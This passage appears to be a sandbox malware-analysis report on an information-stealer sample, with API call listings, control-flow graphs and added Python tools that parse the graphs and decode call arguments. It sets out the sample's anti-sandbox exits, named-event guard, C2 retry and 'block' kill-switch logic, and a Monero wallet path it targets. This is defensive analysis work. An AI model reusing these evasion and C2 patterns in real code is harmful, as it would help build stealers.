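    "801 4c48d0-4c4992 call 4daab0 call 4c4800 call 4daa50 * 5 InternetOpenA StrCmpCA "
    "816 4c499b-4c499f 801->816 817 4c4994 801->817"
)

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
ADDR_RE = re.compile(r"^[0-9a-f]{4,}(-[0-9a-f]{4,})?$")   # "start-end" or a single address


def parse_cfg(text):
    """Tokenize one control_flow_graph line into {node_id: {start, end, items}} and edges.

    items is a list of [name, count]; internal calls are recorded as "call 0x<addr>".
    """
    tokens = text.split()
    if tokens and tokens[0] == "control_flow_graph":
        tokens = tokens[1:]
    nodes, edges, cur, i = {}, [], None, 0
    while i < len(tokens):
        tok = tokens[i]
        m = EDGE_RE.match(tok)
        if m:                                   # "633->634"
            edges.append((int(m.group(1)), int(m.group(2))))
            i += 1
        elif tok.isdigit() and i + 1 < len(tokens) and ADDR_RE.match(tokens[i + 1]):
            cur = int(tok)                      # "634 4da346-4da3da" opens a node
            lo, _, hi = tokens[i + 1].partition("-")
            nodes[cur] = {"start": int(lo, 16), "end": int(hi or lo, 16), "items": []}
            i += 2
        elif tok == "call":                     # "call 4daab0": an internal function
            nodes[cur]["items"].append(["call 0x" + tokens[i + 1], 1])
            i += 2
        elif tok == "*":                        # "* 8": repeat count for the previous item
            nodes[cur]["items"][-1][1] = int(tokens[i + 1])
            i += 2
        else:                                   # any other token is an API name
            nodes[cur]["items"].append([tok, 1])
            i += 1
    return nodes, edges


def api_totals(nodes):
    """Total number of calls per API or callee across the whole function."""
    totals = {}
    for n in nodes.values():
        for name, count in n["items"]:
            totals[name] = totals.get(name, 0) + count
    return totals


def always_executes(nodes, edges, entry, api):
    """True if every path from `entry` to a terminal node passes a block that calls `api`.

    A loop that neither calls `api` nor reaches a terminal node is treated as covered
    (the walk stops at already-seen nodes), so an infinite retry loop is not reported.
    """
    succ = {}
    for a, b in edges:
        succ.setdefault(a, []).append(b)
    stack, seen = [entry], set()
    while stack:
        n = stack.pop()
        if n in seen:
            continue
        seen.add(n)
        if any(name == api for name, _ in nodes[n]["items"]):
            continue                            # this path is covered, stop exploring it
        nxt = succ.get(n, [])
        if not nxt:
            return False                        # terminal block reached without `api`
        stack.extend(nxt)
    return True


if __name__ == "__main__":
    nodes, edges = parse_cfg(SAMPLE_CFG)
    print(len(nodes), "nodes,", len(edges), "edges")
    print(api_totals(nodes))
    print("LoadLibraryA on every path from 633:", always_executes(nodes, edges, 633, "LoadLibraryA"))
    print("GetProcAddress on every path from 633:", always_executes(nodes, edges, 633, "GetProcAddress"))
```

On the sample, LoadLibraryA is on every path from node 633 (both successors of 633 lead into block 634) while GetProcAddress is not, because 634 can fall through to the empty check block 637. Fed the full line of the WinINet function, the same query with entry 801 shows InternetCloseHandle as mandatory and HttpSendRequestA as branch-dependent, which is the quick way to tell a sandbox that never got past InternetConnectA from one that actually posted data.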

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 1090 4d5760-4d57c7 call 4d5d20 call 4dab30 * 3 call 4daa50 * 4 1106 4d57cc-4d57d3 1090->1106 1107 4d57d5-4d5806 call 4dab30 call 4daab0 call 4c1590 call 4d5440 1106->1107 1108 4d5827-4d589c call 4daa50 * 2 call 4c1590 call 4d5510 call 4dabb0 call 4dab10 call 4dade0 StrCmpCA 1106->1108 1124 4d580b-4d5822 call 4dabb0 call 4dab10 1107->1124 1134 4d58e3-4d58f9 call 4dade0 StrCmpCA 1108->1134 1137 4d589e-4d58de call 4daab0 call 4c1590 call 4d5440 call 4dabb0 call 4dab10 1108->1137 1124->1134 1139 4d5a2c-4d5a94 call 4dabb0 call 4dab30 * 2 call 4c16b0 call 4dab10 * 4 call 4c1670 call 4c1550 1134->1139 1140 4d58ff-4d5906 1134->1140 1137->1134 1271 4d5d13-4d5d16 1139->1271 1142 4d590c-4d5913 1140->1142 1143 4d5a2a-4d5aaf call 4dade0 StrCmpCA 1140->1143 1146 4d596e-4d59e3 call 4daa50 * 2 call 4c1590 call 4d5510 call 4dabb0 call 4dab10 call 4dade0 StrCmpCA 1142->1146 1147 4d5915-4d5969 call 4dab30 call 4daab0 call 4c1590 call 4d5440 call 4dabb0 call 4dab10 1142->1147 1161 4d5ab5-4d5abc 1143->1161 1162 4d5be1-4d5c49 call 4dabb0 call 4dab30 * 2 call 4c16b0 call 4dab10 * 4 call 4c1670 call 4c1550 1143->1162 1146->1143 1250 4d59e5-4d5a25 call 4daab0 call 4c1590 call 4d5440 call 4dabb0 call 4dab10 1146->1250 1147->1143 1167 4d5bdf-4d5c64 call 4dade0 StrCmpCA 1161->1167 1168 4d5ac2-4d5ac9 1161->1168 1162->1271 1197 4d5c78-4d5ce1 call 4dabb0 call 4dab30 * 2 call 4c16b0 call 4dab10 * 4 call 4c1670 call 4c1550 1167->1197 1198 4d5c66-4d5c71 Sleep 1167->1198 1175 4d5acb-4d5b1e call 4dab30 call 4daab0 call 4c1590 call 4d5440 call 4dabb0 call 4dab10 1168->1175 1176 4d5b23-4d5b98 call 4daa50 * 2 call 4c1590 call 4d5510 call 4dabb0 call 4dab10 call 4dade0 StrCmpCA 1168->1176 1175->1167 1176->1167 1276 4d5b9a-4d5bda call 4daab0 call 4c1590 call 4d5440 call 4dabb0 call 4dab10 1176->1276 1197->1271 1198->1106 1250->1143 1276->1167
                              APIs
                                • Part of subcall function 004DAB30: lstrlen.KERNEL32(004C4F55,?,?,004C4F55,004E0DDF), ref: 004DAB3B
                                • Part of subcall function 004DAB30: lstrcpy.KERNEL32(004E0DDF,00000000), ref: 004DAB95
                                • Part of subcall function 004DAA50: lstrcpy.KERNEL32(004E0E1A,00000000), ref: 004DAA98
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 004D5894
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004D58F1
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004D5AA7
                                • Part of subcall function 004DAAB0: lstrcpy.KERNEL32(?,00000000), ref: 004DAAF6
                                • Part of subcall function 004D5440: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004D5478
                                • Part of subcall function 004DABB0: lstrcpy.KERNEL32(?,004E0E1A), ref: 004DAC15
                                • Part of subcall function 004D5510: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 004D5568
                                • Part of subcall function 004D5510: lstrlen.KERNEL32(00000000), ref: 004D557F
                                • Part of subcall function 004D5510: StrStrA.SHLWAPI(00000000,00000000), ref: 004D55B4
                                • Part of subcall function 004D5510: lstrlen.KERNEL32(00000000), ref: 004D55D3
                                • Part of subcall function 004D5510: lstrlen.KERNEL32(00000000), ref: 004D55FE
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 004D59DB
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 004D5B90
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004D5C5C
                              • Sleep.KERNEL32(0000EA60), ref: 004D5C6B
                              Strings
                              Memory Dump Source
• Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen$Sleep
                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                              • API String ID: 507064821-2791005934
                              • Opcode ID: b311f0758c4772eed45b5840c0dc24964a910a4c16f81756d98d9f51c8bbdec2
                              • Instruction ID: b9f14ccf926d9f128816139c61003f8f784c1926930e2a7b94696589544edb65
                              • Opcode Fuzzy Hash: b311f0758c4772eed45b5840c0dc24964a910a4c16f81756d98d9f51c8bbdec2
                              • Instruction Fuzzy Hash: 72E1A2319101049ACB14FBA1EC76EED737DAF50304F00865FB54666295EF3CAB19CBAA

                              Control-flow Graph

• Graph (legend: Executed / Not Executed) for the function at 4d19f0-4d1c1d: the entry block compares its input with the literal block (StrCmpCA at 4d1a15) and calls ExitProcess at 4d1a21 on a match; otherwise a loop starting at 4d1a44 dispatches through nine further StrCmpCA blocks (4d1aad, 4d1acf, 4d1afd, 4d1b1f, 4d1b41, 4d1b63, 4d1b82, 4d1ba1, 4d1bc0) and four calls to 4dab30, rejoins at 4d1bee-4d1c0d, and leaves via 4d1c12-4d1c1d.
                              APIs
                              • StrCmpCA.SHLWAPI(00000000,block), ref: 004D1A15
                              • ExitProcess.KERNEL32 ref: 004D1A21
                              Strings
                              Memory Dump Source
• Source File and associated dumps: same as for the first function above (00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true)
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess
                              • String ID: block
                              • API String ID: 621844428-2199623458
                              • Opcode ID: dbff9185b36ff768cb4e33ab44a7cff738eeac4ade4753d5089a841993ef5144
                              • Instruction ID: 3703b13f0496151f0cd8fb90073cfe9a6f46b81a9606ff021f67efea521517fc
                              • Opcode Fuzzy Hash: dbff9185b36ff768cb4e33ab44a7cff738eeac4ade4753d5089a841993ef5144
                              • Instruction Fuzzy Hash: FF514F74B54209ABCB08DF94D9A4FAE77B9EF44704F10404BE812AB360E778F951CB5A

                              Control-flow Graph

                              APIs
                                • Part of subcall function 004D9BB0: GetProcAddress.KERNEL32(74DD0000,012A24D0), ref: 004D9BF1
                                • Part of subcall function 004D9BB0: GetProcAddress.KERNEL32(74DD0000,012A24E8), ref: 004D9C0A
                                • Part of subcall function 004D9BB0: GetProcAddress.KERNEL32(74DD0000,012A2248), ref: 004D9C22
                                • Part of subcall function 004D9BB0: GetProcAddress.KERNEL32(74DD0000,012A2350), ref: 004D9C3A
                                • Part of subcall function 004D9BB0: GetProcAddress.KERNEL32(74DD0000,012A2230), ref: 004D9C53
                                • Part of subcall function 004D9BB0: GetProcAddress.KERNEL32(74DD0000,012A9158), ref: 004D9C6B
                                • Part of subcall function 004D9BB0: GetProcAddress.KERNEL32(74DD0000,01295DB0), ref: 004D9C83
                                • Part of subcall function 004D9BB0: GetProcAddress.KERNEL32(74DD0000,01295B10), ref: 004D9C9C
                                • Part of subcall function 004D9BB0: GetProcAddress.KERNEL32(74DD0000,012A22F0), ref: 004D9CB4
                                • Part of subcall function 004D9BB0: GetProcAddress.KERNEL32(74DD0000,012A23C8), ref: 004D9CCC
                                • Part of subcall function 004D9BB0: GetProcAddress.KERNEL32(74DD0000,012A2338), ref: 004D9CE5
                                • Part of subcall function 004D9BB0: GetProcAddress.KERNEL32(74DD0000,012A2380), ref: 004D9CFD
                                • Part of subcall function 004D9BB0: GetProcAddress.KERNEL32(74DD0000,01295B30), ref: 004D9D15
                                • Part of subcall function 004D9BB0: GetProcAddress.KERNEL32(74DD0000,012A23E0), ref: 004D9D2E
                                • Part of subcall function 004DAA50: lstrcpy.KERNEL32(004E0E1A,00000000), ref: 004DAA98
                                • Part of subcall function 004C11D0: ExitProcess.KERNEL32 ref: 004C1211
                                • Part of subcall function 004C1160: GetSystemInfo.KERNEL32(?), ref: 004C116A
                                • Part of subcall function 004C1160: ExitProcess.KERNEL32 ref: 004C117E
                                • Part of subcall function 004C1110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 004C112B
                                • Part of subcall function 004C1110: VirtualAllocExNuma.KERNEL32(00000000), ref: 004C1132
                                • Part of subcall function 004C1110: ExitProcess.KERNEL32 ref: 004C1143
                                • Part of subcall function 004C1220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 004C123E
                                • Part of subcall function 004C1220: ExitProcess.KERNEL32 ref: 004C1294
                                • Part of subcall function 004D6A10: GetUserDefaultLangID.KERNEL32 ref: 004D6A14
                                • Part of subcall function 004C1190: ExitProcess.KERNEL32 ref: 004C11C6
                                • Part of subcall function 004D79E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004C11B7), ref: 004D7A10
                                • Part of subcall function 004D79E0: RtlAllocateHeap.NTDLL(00000000), ref: 004D7A17
                                • Part of subcall function 004D79E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 004D7A2F
                                • Part of subcall function 004D7A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 004D7AA0
                                • Part of subcall function 004D7A70: RtlAllocateHeap.NTDLL(00000000), ref: 004D7AA7
                                • Part of subcall function 004D7A70: GetComputerNameA.KERNEL32(?,00000104), ref: 004D7ABF
                                • Part of subcall function 004DACC0: lstrlen.KERNEL32(?,012A8F18,?,\Monero\wallet.keys,004E0E1A), ref: 004DACD5
                                • Part of subcall function 004DACC0: lstrcpy.KERNEL32(00000000), ref: 004DAD14
                                • Part of subcall function 004DACC0: lstrcat.KERNEL32(00000000,00000000), ref: 004DAD22
                                • Part of subcall function 004DABB0: lstrcpy.KERNEL32(?,004E0E1A), ref: 004DAC15
                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,012A9188,?,004E10F4,?,00000000,?,004E10F8,?,00000000,004E0AF3), ref: 004D6D6A
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004D6D88
                              • CloseHandle.KERNEL32(00000000), ref: 004D6D99
                              • Sleep.KERNEL32(00001770), ref: 004D6DA4
                              • CloseHandle.KERNEL32(?,00000000,?,012A9188,?,004E10F4,?,00000000,?,004E10F8,?,00000000,004E0AF3), ref: 004D6DBA
                              • ExitProcess.KERNEL32 ref: 004D6DC2
                              Memory Dump Source
• Source File and associated dumps: same as for the first function above (00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true)
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                              • String ID:
                              • API String ID: 2931873225-0
                              • Opcode ID: e768a26e05dfe301e4f1dadc3fa181cfaee51e81c2a5acafd2a5bc30d9d3fe0a
                              • Instruction ID: 3f074996ebf3cc5d4dc7f1814a1278416d07a0fa6090fb5e8ecb82ce3044d838
                              • Opcode Fuzzy Hash: e768a26e05dfe301e4f1dadc3fa181cfaee51e81c2a5acafd2a5bc30d9d3fe0a
                              • Instruction Fuzzy Hash: 30312B31A54108ABCB04F7A2DC76BAE7279AF44704F10451FF11262292DF7C6A06C66E

                              Control-flow Graph

• Graph (legend: Executed / Not Executed) for the function at 4d6d5a-4d6dc2: OpenEventA at 4d6d5a-4d6d77 is followed by one of two paths; one closes the handle, calls Sleep at 4d6d95-4d6da4 and loops back to 4d6d5a, the other calls CreateEventA at 4d6d79-4d6d91, then 4d6bc0 and 4d5d60, and ends with CloseHandle and ExitProcess at 4d6dac-4d6dc2.
                              APIs
                              • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,012A9188,?,004E10F4,?,00000000,?,004E10F8,?,00000000,004E0AF3), ref: 004D6D6A
                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004D6D88
                              • CloseHandle.KERNEL32(00000000), ref: 004D6D99
                              • Sleep.KERNEL32(00001770), ref: 004D6DA4
                              • CloseHandle.KERNEL32(?,00000000,?,012A9188,?,004E10F4,?,00000000,?,004E10F8,?,00000000,004E0AF3), ref: 004D6DBA
                              • ExitProcess.KERNEL32 ref: 004D6DC2
                              Memory Dump Source
• Source File and associated dumps: same as for the first function above (00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true)
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                              • String ID:
                              • API String ID: 941982115-0
                              • Opcode ID: 8ba99d6cb5ddda484e4da6255355945efbed0162effe826cd370a3deb993298b
                              • Instruction ID: 83941125082d73453bb4eb0185b76705b71027e7f67f0f06be06695073ac49e6
                              • Opcode Fuzzy Hash: 8ba99d6cb5ddda484e4da6255355945efbed0162effe826cd370a3deb993298b
                              • Instruction Fuzzy Hash: A2F08930648209AFEB04BBA0EC2ABBE3376BF54705F11451BF512953D0CBBC5501C65E

                              Control-flow Graph

                              APIs
                              • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004C4889
                              • InternetCrackUrlA.WININET(00000000,00000000), ref: 004C4899
                              Strings
                              Memory Dump Source
• Source File and associated dumps: same as for the first function above (00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true)
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CrackInternetlstrlen
                              • String ID: <
                              • API String ID: 1274457161-4251816714
                              • Opcode ID: 4a6fbf3e10695cf58d071060c52e5e09db6249c59785839e7f9973881358e154
                              • Instruction ID: 710767674239f406250e588df025948a3fe9bb8381c05a65ad80721528dfcf80
                              • Opcode Fuzzy Hash: 4a6fbf3e10695cf58d071060c52e5e09db6249c59785839e7f9973881358e154
                              • Instruction Fuzzy Hash: 21214FB1D00208ABDF14DFA5E845BDD7B75FB45320F10862AF915A72D0DB746A05CF91

                              Control-flow Graph

                              APIs
                                • Part of subcall function 004DAAB0: lstrcpy.KERNEL32(?,00000000), ref: 004DAAF6
                                • Part of subcall function 004C62D0: InternetOpenA.WININET(004E0DFF,00000001,00000000,00000000,00000000), ref: 004C6331
                                • Part of subcall function 004C62D0: StrCmpCA.SHLWAPI(?,012AE8D8), ref: 004C6353
                                • Part of subcall function 004C62D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004C6385
                                • Part of subcall function 004C62D0: HttpOpenRequestA.WININET(00000000,GET,?,012AE0E0,00000000,00000000,00400100,00000000), ref: 004C63D5
                                • Part of subcall function 004C62D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004C640F
                                • Part of subcall function 004C62D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004C6421
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 004D5478
                              Strings
                              Memory Dump Source
• Source File and associated dumps: same as for the first function above (00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true)
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                              • String ID: ERROR$ERROR
                              • API String ID: 3287882509-2579291623
                              • Opcode ID: 9faad4b4227edac98a01de3f0a46344e86a384640832c84dcecdb2768ea01239
                              • Instruction ID: 21d612362020b0c846f1f3cf5e8875c6f0d68a52dea046de549b9fede457c04a
                              • Opcode Fuzzy Hash: 9faad4b4227edac98a01de3f0a46344e86a384640832c84dcecdb2768ea01239
                              • Instruction Fuzzy Hash: CF114F30900008AACB14FF65D876AED7379AF10344F40455FE90A466A6EF38AB15C65A

                              Control-flow Graph

• Graph (legend: Executed / Not Executed) for the function at 4c1220-4c129d: GlobalMemoryStatusEx at 4c1220-4c1247, then either two calls to 4ddd30 (4c1249-4c1271) or the block at 4c1273; the comparisons at 4c1281-4c1290 lead either to ExitProcess at 4c1292-4c1294 or to the return path at 4c129a.
                              APIs
                              • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 004C123E
                              • ExitProcess.KERNEL32 ref: 004C1294
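The function records above list each Win32 call with raw hexadecimal arguments, which hides what a reader actually wants to know: that 0x1F0003 passed to OpenEventA is EVENT_ALL_ACCESS, that 0x40 passed to GlobalMemoryStatusEx is sizeof(MEMORYSTATUSEX), that 0x00400100 on HttpOpenRequestA is INTERNET_FLAG_KEEP_CONNECTION|INTERNET_FLAG_PRAGMA_NOCACHE, and that the Sleep values are 60 s (C2 retry after an ERROR reply) and 6 s (wait on the named event). The Python below is an added example, not part of the Joe Sandbox report or of the sample's code: it parses API lines in the report's own format, decodes those arguments with the SDK constant values, and tags a record with the behaviour its call set implies. The sample records are copied from this page and keyed by the function's entry address; the tagging rules in BEHAVIOURS are heuristics written for this illustration, not anything the report states.

```python
import re
from dataclasses import dataclass

LINE_RE = re.compile(r"^(?:Part of subcall function [0-9A-F]+: )?"
                     r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\),)? ref: (?P<ref>[0-9A-F]+)$")

# Win32 / WinINet constants, values as in the SDK headers.
EVENT_ALL_ACCESS = 0x001F0003
SIZEOF_MEMORYSTATUSEX = 0x40          # dwLength GlobalMemoryStatusEx expects
INTERNET_OPTION_SECURITY_FLAGS = 0x1F
HTTP_FLAGS = {0x00000100: "INTERNET_FLAG_PRAGMA_NOCACHE", 0x00400000: "INTERNET_FLAG_KEEP_CONNECTION",
              0x00800000: "INTERNET_FLAG_SECURE", 0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE",
              0x80000000: "INTERNET_FLAG_RELOAD"}

# Heuristic tags written for this page: (required API names, required string literal, label).
BEHAVIOURS = [
    ({"StrCmpCA", "Sleep"}, "ERROR", "C2 retry loop: sleeps and re-requests while the server answers ERROR"),
    ({"StrCmpCA", "ExitProcess"}, "block", "server-side kill switch: exits when the server answers block"),
    ({"OpenEventA", "CreateEventA", "Sleep", "ExitProcess"}, None, "single-instance guard on a named event"),
    ({"GlobalMemoryStatusEx", "ExitProcess"}, None, "physical-memory sandbox check that exits on failure"),
]

# Constructed sample: API lines copied from function records on this page, keyed by entry address.
SAMPLE_RECORDS = {
    "4d5760": ["StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 004D5894",
               "Sleep.KERNEL32(0000EA60), ref: 004D5C6B"],
    "4d19f0": ["StrCmpCA.SHLWAPI(00000000,block), ref: 004D1A15",
               "ExitProcess.KERNEL32 ref: 004D1A21"],
    "4d6d5a": ["OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,012A9188), ref: 004D6D6A",
               "CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004D6D88",
               "Sleep.KERNEL32(00001770), ref: 004D6DA4",
               "ExitProcess.KERNEL32 ref: 004D6DC2"],
    "4c1220": ["GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 004C123E",
               "ExitProcess.KERNEL32 ref: 004C1294"],
    "4d5440": ["Part of subcall function 004C62D0: HttpOpenRequestA.WININET(00000000,GET,?,012AE0E0,00000000,00000000,00400100,00000000), ref: 004C63D5",
               "Part of subcall function 004C62D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 004C640F"],
}

@dataclass
class Call:
    api: str
    module: str
    args: list       # int for hex values, str for literals the report resolved, None for '?'
    ref: int         # address of the call instruction
    note: str = ""

def parse_arg(tok: str):
    if tok == "?":
        return None
    return int(tok, 16) if re.fullmatch(r"[0-9A-F]{8}", tok) else tok

def flag_names(value: int, table: dict) -> str:
    names = [name for bit, name in table.items() if value & bit]
    if value & ~sum(table):               # bits the table does not cover
        names.append(f"0x{value & ~sum(table):08X}")
    return "|".join(names) or "0"

def decode(api: str, args: list) -> str:
    """Short reading of a known API's raw arguments."""
    lits = [a for a in args if isinstance(a, str)]
    if api == "Sleep" and args:
        return f"sleep {args[0]} ms ({args[0] / 1000:g} s)"
    if api == "OpenEventA" and args:
        acc = "EVENT_ALL_ACCESS" if args[0] == EVENT_ALL_ACCESS else f"0x{args[0]:08X}"
        return f"open existing named object with {acc}"
    if api == "GlobalMemoryStatusEx" and args:
        ok = args[0] == SIZEOF_MEMORYSTATUSEX
        return f"dwLength=0x{args[0]:X} ({'sizeof(MEMORYSTATUSEX)' if ok else 'unexpected size'})"
    if api == "HttpOpenRequestA" and len(args) > 6:
        return f"verb {args[1]}, flags {flag_names(args[6], HTTP_FLAGS)}"
    if api == "InternetSetOptionA" and len(args) > 1 and args[1] == INTERNET_OPTION_SECURITY_FLAGS:
        return "set INTERNET_OPTION_SECURITY_FLAGS"
    if api == "StrCmpCA" and lits:
        return f'compare with literal "{lits[0]}"'
    if api == "ExitProcess":
        return "terminates the process"
    return ""

def parse_line(line: str) -> Call:
    m = LINE_RE.match(line.strip())
    if not m:
        raise ValueError(f"not an API line: {line!r}")
    raw = m.group("args")
    args = [parse_arg(t) for t in raw.split(",")] if raw else []
    call = Call(m.group("api"), m.group("mod"), args, int(m.group("ref"), 16))
    call.note = decode(call.api, call.args)
    return call

def classify(calls: list) -> list:
    apis = {c.api for c in calls}
    lits = {a for c in calls for a in c.args if isinstance(a, str)}
    return [tag for need, lit, tag in BEHAVIOURS if need <= apis and (lit is None or lit in lits)]

def analyse(records: dict = SAMPLE_RECORDS) -> dict:
    """Map each record name to (decoded calls, behaviour tags)."""
    out = {}
    for name, lines in records.items():
        calls = [parse_line(l) for l in lines]
        out[name] = (calls, classify(calls))
    return out
```

Calling analyse() on the constructed records tags 4d5760 as the C2 retry loop, 4d19f0 as the block kill switch, 4d6d5a as the named-event single-instance guard and 4c1220 as the memory-size check; 4d5440 gets no tag, only decoded WinINet arguments. To apply it to another report, paste that report's API lines into the records dict; lines that do not match the report's call format raise ValueError rather than being silently skipped.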
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.1729433035.00000000004C0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729733847.00000000004EC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729733847.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729733847.0000000000609000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729733847.000000000062E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1729733847.0000000000796000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1730764105.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1730764105.0000000000930000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1730764105.0000000000A11000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1730764105.0000000000A35000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1730764105.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1730764105.0000000000A4D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731032943.0000000000A4E000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731152899.0000000000BEC000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731169576.0000000000BED000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_4c0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitGlobalMemoryProcessStatus
                              • String ID: @
                              • API String ID: 803317263-2766056989
                              • Opcode ID: 1f56d8d9bc7a65a909ce54e4be8f0002849baf047c449669cf0da34e2e4c50f5
                              • Instruction ID: 06a6ad38960ad37c3911eaf935dd60d743ddbbe9c735a40db260f9399f12b89a
                              • Opcode Fuzzy Hash: 1f56d8d9bc7a65a909ce54e4be8f0002849baf047c449669cf0da34e2e4c50f5
                              • Instruction Fuzzy Hash: 53014BB4D80308AAEF50EFE4DD4AFAEBB78AB15705F20848EE704B62D1C67C5541875D
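The control-flow graph of the function at 004C1220 above is exported by the sandbox as one flattened line of block ids, address ranges, call annotations and "a->b" edges. The Python below is an added example, not code from the report or from Joe Sandbox: it parses that line back into basic blocks and edges, enumerates every path from the entry block to the ExitProcess call, and reports which API is called on all of those paths, i.e. the result the exit decision can depend on (here GlobalMemoryStatusEx, consistent with a check on installed RAM). The raw line is copied from the page; the rule that block ids grow monotonically, used to tell a block header apart from a numeric annotation such as "* 2", is an assumption about the export format.

```python
import re
from collections import defaultdict

# Flattened control-flow-graph line for the function at 0x4C1220, copied from
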